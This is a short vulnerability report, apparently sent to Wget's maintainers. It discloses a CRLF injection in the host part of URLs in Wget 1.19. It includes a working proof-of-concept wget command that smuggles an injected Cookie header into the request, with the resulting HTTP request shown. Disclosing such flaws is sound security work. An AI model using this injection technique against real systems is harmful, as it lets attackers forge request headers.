Hi I just found that there is a CRLF Injection in the latest version of Wget 1.19.
Wget uses urlencode to encode CRLF in PATH part but doesn't use in HOST port. So an attacker can inject arbitrary header in the request. For example: # This will fail $ wget 'http://127.0.0.1/%0d%0Cookie: hi' GET /%0d%0Cookie:%20hi HTTP/1.1 User-Agent: Wget/1.19 (linux-gnu) Accept: */* Accept-Encoding: identity Host: 127.0.0.1 Connection: Keep-Alive # This will work $ wget 'http://127.0.0.1%0d%0aCookie%3a hi%0a/' GET / HTTP/1.1 User-Agent: Wget/1.19 (linux-gnu) Accept: */* Accept-Encoding: identity Host: [127.0.0.1 *cookie: hi* ] Connection: Keep-Alive Wish you aware this, thanks for your reading :) -- - Orange -
